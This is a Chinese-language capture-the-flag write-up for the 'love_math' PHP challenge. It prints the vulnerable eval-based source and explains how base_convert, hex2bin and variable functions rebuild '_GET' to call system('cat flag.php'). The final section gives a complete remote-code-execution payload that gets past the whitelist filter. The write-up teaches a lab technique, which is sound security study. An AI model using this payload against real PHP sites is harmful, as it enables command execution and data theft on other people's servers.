Web20-love_math（base_convert()函数+php动态函数调用机制+hex2bin()+_GET）

一.题目链接：

https://adworld.xctf.org.cn/challenges/list

二.代码分析

<?php
error_reporting(0);
//听说你很喜欢数学，不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
    show_source(__FILE__);
}else{
    //例子 c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 80) {
        die("太长了不会算");
    }
    //设置黑名单：这里过滤了空格，\t,\r,\n,\,",`,[]符号
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //设置的白名单，常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);  
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //帮你算出答案
    eval('echo '.$content.';');
}

三.基础知识

3.1 base_convert()函数，将数字转换为其他进制，可以构造字符串

• 语法：base_convert(string $number,int $frombase,int $tobase)
• 参数解释：string $number --> 要转换的数字，$frombase -->原始进制，$tobase -->想要转换的进制
• eg：base_convert(37907361743,10,36)(dechex(1598506324))
• 参数解释：
    1.(37907361743,10,36) --> 这里是为了把这个从十进制变为36进制，也就是对应的hex2bin,这里如果不知道这个数字怎么转化，我们可以通过php的echo打印检验，检验命令如下:echo base_convert("hex2bin", 36, 10); 通过这个命令，我们可以得到hexbin()函数的值，因为在本题中，他并不在白名单中，我们需要绕过。
    2.(dechex(1598506324) --> 这里是为了使用_GET动态函数调用

3.2 hex2bin()函数

• 概念：这个函数
• 语法：string hex2bin (string $hex_string)
• 参数解释：
    1.$hex_string --> 要转换的十六进制字符串
• eg：hex2bin("5f474554")
• 参数解释：将这个十六进制的字符转变成二进制，并且找到对应的ASCII码，这里对应的就是_GET

3.2 什么是_GET?

• 概念：是php的一个超全局变量，用于收集通过URL参数，（即?key=value形式）传递的参数
• eg：http://example.com/test.php?action=system&param=cat /flag
    那么这里通过$_GET['action']得到的值就是system,同理，$_GET['param']得到的值就是cat flag

3.3 php动态函数调用机制

• 概念：在php中，函数名可以用字符串表示，并通过变量来动态调用。这种特性成为“可变函数”
• 形如：$a = 'system'; -- $a('cat /flag'); --》等价于直接调用system('cat /flag')

四.开始解题

1.经过上面知识点的熏陶，我们来解释下面的playload到底是什么意思,为什么通过以下playload可以绕过重重限制得到我们想要的flag

?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=cat%20flag.php

//参数的解释：
base_convert(37907361743,10,36)   => "hex2bin"
dechex(1598506324)                => "5f 47 45 54"
$pi=hex2bin("5f 47 45 54")        => 对应着$ip="_GET"      //hex2bin将一串16进制的数转换为二进制的数
($$pi){pi}(($$pi)                 => (_$GET){pi}(_$GET){abs}        //{}可以代替[]
pi=system&abs=cat%20flag.php      => 这里就是给动态的函数调用进行真实的赋值

2.把构造好的playload拼接到url后面，历经千辛万苦，终于把答案搞出来了，真不容易
对了，这里的flag输入后要空一格